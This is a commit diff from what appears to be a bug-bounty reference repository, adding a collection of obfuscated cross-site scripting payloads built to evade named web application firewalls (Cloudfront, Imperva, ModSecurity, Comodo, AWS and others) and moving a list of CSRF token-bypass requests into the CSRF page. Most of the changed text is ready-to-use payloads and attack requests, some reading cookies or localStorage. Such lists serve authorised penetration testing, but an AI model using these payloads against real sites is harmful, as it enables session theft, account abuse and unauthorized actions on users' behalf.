STRLCPY/AllAboutBugBounty

feat: added XSS payloads to bypass WAF
Muhammad Daffa committed 1 year ago

4f516068

1 parent 5c691617

■ ■ ■ ■ ■ ■

Bypass/Bypass 304.md

1	-	# Bypass 304 (Not Modified)
2	-
3	-	1. Delete "If-None-Match" header
4	-	```
5	-	GET /admin HTTP/1.1
6	-	Host: target.com
7	-	If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
8	-	```
9	-	Try this to bypass
10	-	```
11	-	GET /admin HTTP/1.1
12	-	Host: target.com
13	-	```
14	-
15	-	2. Adding random character in the end of "If-None-Match" header
16	-	```
17	-	GET /admin HTTP/1.1
18	-	Host: target.com
19	-	If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
20	-	```
21	-	Try this to bypass
22	-	```
23	-	GET /admin HTTP/1.1
24	-	Host: target.com
25	-	Host: target.com
26	-	If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
27	-	```
28	-
29	-	## References
30	-	* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
31	-

■ ■ ■ ■ ■ ■

Bypass/Bypass CSRF.md

1	-	# Bypass CSRF
2	-
3	-	1. Change single character
4	-	```
5	-	POST /register HTTP/1.1
6	-	Host: target.com
7	-	...
8	-
9	-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
10	-	```
11	-	Try this to bypass
12	-	```
13	-	POST /register HTTP/1.1
14	-	Host: target.com
15	-	...
16	-
17	-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
18	-	```
19	-
20	-	2. Sending empty value of token
21	-	```
22	-	POST /register HTTP/1.1
23	-	Host: target.com
24	-	...
25	-
26	-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
27	-	```
28	-	Try this to bypass
29	-	```
30	-	POST /register HTTP/1.1
31	-	Host: target.com
32	-	...
33	-
34	-	username=dapos&password=123456&token=
35	-	```
36	-
37	-	3. Replace the token with same length
38	-	```
39	-	POST /register HTTP/1.1
40	-	Host: target.com
41	-	...
42	-
43	-	username=dapos&password=123456&token=aaaaaa
44	-	```
45	-	Try this to bypass
46	-	```
47	-	POST /register HTTP/1.1
48	-	Host: target.com
49	-	...
50	-
51	-	username=dapos&password=123456&token=aaabaa
52	-	```
53	-	4. Changing POST / GET method
54	-	```
55	-	POST /register HTTP/1.1
56	-	Host: target.com
57	-	...
58	-
59	-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
60	-	```
61	-	Try this to bypass
62	-	```
63	-	GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
64	-	Host: target.com
65	-	...
66	-	```
67	-
68	-	5. Remove the token from request
69	-	```
70	-	POST /register HTTP/1.1
71	-	Host: target.com
72	-	...
73	-
74	-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
75	-	```
76	-	Try this to bypass
77	-	```
78	-	POST /register HTTP/1.1
79	-	Host: target.com
80	-	...
81	-
82	-	username=dapos&password=123456
83	-	```
84	-
85	-	6. Use another user's valid token
86	-	```
87	-	POST /register HTTP/1.1
88	-	Host: target.com
89	-	...
90	-
91	-	username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
92	-	```
93	-
94	-	7. Try to decrypt hash
95	-	```
96	-	POST /register HTTP/1.1
97	-	Host: target.com
98	-	...
99	-
100	-	username=dapos&password=123456&token=MTIzNDU2
101	-	```
102	-	MTIzNDU2 => 123456 with base64
103	-
104	-	8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
105	-	```
106	-	POST /register HTTP/1.1
107	-	Host: target.com
108	-	...
109	-
110	-	username=dapos&password=123456&token=vi802jg9f8akd9j123
111	-	```
112	-	When we register again, the request like this
113	-	```
114	-	POST /register HTTP/1.1
115	-	Host: target.com
116	-	...
117	-
118	-	username=dapos&password=123456&token=vi802jg9f8akd9j124
119	-	```
120	-	If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
121	-

■ ■ ■ ■ ■ ■ ■

Cross Site Request Forgery.md

		skipped 3 lines
4	4		Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
5	5
6	6		## Where to find
7		-	Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
	7	+	Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack.
8	8
9	9		## How to exploit
10	10		1. HTML GET Method
		skipped 82 lines
93	93		<br>
94	94		</body>
95	95		```
	96	+
	97	+	# Bypass CSRF Token
	98	+	But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things:
	99	+
	100	+	1. Change single character
	101	+	```
	102	+	POST /register HTTP/1.1
	103	+	Host: target.com
	104	+	...
	105	+
	106	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
	107	+	```
	108	+	Try this to bypass
	109	+	```
	110	+	POST /register HTTP/1.1
	111	+	Host: target.com
	112	+	...
	113	+
	114	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
	115	+	```
	116	+
	117	+	2. Sending empty value of token
	118	+	```
	119	+	POST /register HTTP/1.1
	120	+	Host: target.com
	121	+	...
	122	+
	123	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
	124	+	```
	125	+	Try this to bypass
	126	+	```
	127	+	POST /register HTTP/1.1
	128	+	Host: target.com
	129	+	...
	130	+
	131	+	username=dapos&password=123456&token=
	132	+	```
	133	+
	134	+	3. Replace the token with same length
	135	+	```
	136	+	POST /register HTTP/1.1
	137	+	Host: target.com
	138	+	...
	139	+
	140	+	username=dapos&password=123456&token=aaaaaa
	141	+	```
	142	+	Try this to bypass
	143	+	```
	144	+	POST /register HTTP/1.1
	145	+	Host: target.com
	146	+	...
	147	+
	148	+	username=dapos&password=123456&token=aaabaa
	149	+	```
	150	+	4. Changing POST / GET method
	151	+	```
	152	+	POST /register HTTP/1.1
	153	+	Host: target.com
	154	+	...
	155	+
	156	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
	157	+	```
	158	+	Try this to bypass
	159	+	```
	160	+	GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
	161	+	Host: target.com
	162	+	...
	163	+	```
	164	+
	165	+	5. Remove the token from request
	166	+	```
	167	+	POST /register HTTP/1.1
	168	+	Host: target.com
	169	+	...
	170	+
	171	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
	172	+	```
	173	+	Try this to bypass
	174	+	```
	175	+	POST /register HTTP/1.1
	176	+	Host: target.com
	177	+	...
	178	+
	179	+	username=dapos&password=123456
	180	+	```
	181	+
	182	+	6. Use another user's valid token
	183	+	```
	184	+	POST /register HTTP/1.1
	185	+	Host: target.com
	186	+	...
	187	+
	188	+	username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
	189	+	```
	190	+
	191	+	7. Try to decrypt hash
	192	+	```
	193	+	POST /register HTTP/1.1
	194	+	Host: target.com
	195	+	...
	196	+
	197	+	username=dapos&password=123456&token=MTIzNDU2
	198	+	```
	199	+	MTIzNDU2 => 123456 with base64
	200	+
	201	+	8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
	202	+	```
	203	+	POST /register HTTP/1.1
	204	+	Host: target.com
	205	+	...
	206	+
	207	+	username=dapos&password=123456&token=vi802jg9f8akd9j123
	208	+	```
	209	+	When we register again, the request like this
	210	+	```
	211	+	POST /register HTTP/1.1
	212	+	Host: target.com
	213	+	...
	214	+
	215	+	username=dapos&password=123456&token=vi802jg9f8akd9j124
	216	+	```
	217	+	If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
	218	+

■ ■ ■ ■ ■ ■

Cross Site Scripting.md

		skipped 343 lines
344	344		```
345	345		<svg%0Aonauxclick=0;[1].some(confirm)//
346	346
347		-	<svg onload=alert%26%230000000040"")>
	347	+	<svg/onload={alert`1`}>
348	348
349	349		<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;(a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1))>
350		-	<svg onx=() onload=(confirm)(1)>
351		-
352		-	<svg onx=() onload=(confirm)(document.cookie)>
353		-
354		-	<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
355		-
356		-	Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
357	350
358	351		"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
359	352
360		-	Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
361		-
362	353		"><onx=[] onmouseover=prompt(1)>
363	354
364		-	%2sscript%2ualert()%2s/script%2u -xss popup
365		-
366		-	<svg onload=alert%26%230000000040"1")>
	355	+	%2sscript%2ualert()%2s/script%2u
367	356
368	357		"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"//Onx=""//onfocus=prompt(1)>"//Onx=""//%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
369	358
370	359		[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
	360	+
	361	+	<svg onload=alert%26%230000000040"1")>
371	362
372	363		<svg onload=prompt%26%230000000040document.domain)>
373	364
		skipped 5 lines
379	370
380	371		<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
381	372
	373	+	<img ignored=() src=x onerror=prompt(1)>
	374	+
	375	+	<svg onx=() onload=(confirm)(1)>
	376	+
	377	+	<--`<img/src=` onerror=confirm``> --!>
	378	+
	379	+	<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
	380	+
	381	+	<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
	382	+
	383	+	'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
	384	+
	385	+	'"><img/src/onerror=.1\|alert``>
	386	+
382	387		:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
383	388
384		-	<img ignored=() src=x onerror=prompt(1)>
	389	+	Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
	390	+	```
	391	+
	392	+	2. Cloudfront
	393	+	```
	394	+	">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
	395	+
	396	+	<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
	397	+
	398	+	"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
385	399		```
386	400
	401	+	3. Cloudbric
	402	+	```
	403	+	<a69/onclick=[1].findIndex(alert)>pew
	404	+	```
	405	+
	406	+	4. Comodo WAF
	407	+	```
	408	+	<input/oninput='new Function`confir\u006d\`0\``'>
	409	+
	410	+	<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
	411	+	```
	412	+
	413	+	5. ModSecurity
	414	+	```
	415	+	<a href="jav%0Dascript&colon;alert(1)">
	416	+	```
	417	+
	418	+	6. Imperva
	419	+	```
	420	+	<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
	421	+
	422	+	<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
	423	+
	424	+	<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
	425	+
	426	+	<a69/onclick=write()>pew
	427	+
	428	+	<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
	429	+
	430	+	<svg onload\r\n=$.globalEval("al"+"ert()");>
	431	+
	432	+	<svg/onload=self[`aler`%2b`t`]`1`>
	433	+
	434	+	%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
	435	+
	436	+	<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
	437	+
	438	+	<img/src=q onerror='new Function`al\ert\`1\``'>
	439	+
	440	+	<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
	441	+	```
	442	+
	443	+	7. AWS
	444	+	```
	445	+	<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
	446	+	```
	447	+
	448	+	If you want to see the other payload for other WAF, check this [link](https://github.com/0xInfection/Awesome-WAF)
	449	+
387	450		## References
388	451		- [Brute Logic](https://brutelogic.com.br/)
	452	+	- [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF)
389	453		- Some random twitter posts

■ ■ ■ ■ ■ ■

README.md

		skipped 21 lines
22	22		- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
23	23		- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
24	24		- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
	25	+	- [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
25	26		- SQL Injection (SOON)
	27	+	- [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
26	28		- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
27	29
28	30		## Checklist
		skipped 3 lines
32	34		## List Bypass
33	35		- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
34	36		- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
35		-	- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
36	37		- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
37	38		- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
38		-	- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
39	39
40	40		## Miscellaneous
41	41		- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
		skipped 8 lines
50	50		- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
51	51		- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
52	52		- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
	53	+	- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
53	54		- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
54	55		- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
55		-	- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
	56	+	- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
56	57		- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
57		-	- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
58	58		- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
59	59		- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
60	60		- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
		skipped 8 lines
69	69		- [ ] Tidy up the reconnaisance folder
70	70		- [ ] Seperate the bypass from some vulnerability readme
71	71		- [ ] Writes multiple payload bypasses for each vulnerability
72		-	- [ ] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
	72	+	- [x] Payload XSS for each WAF (Cloudflare, Cloudfront, AWS, etc)
73	73		- [ ] Payload SQL injection for each WAF (Cloudflare, Cloudfront)

feat: added XSS payloads to bypass WAF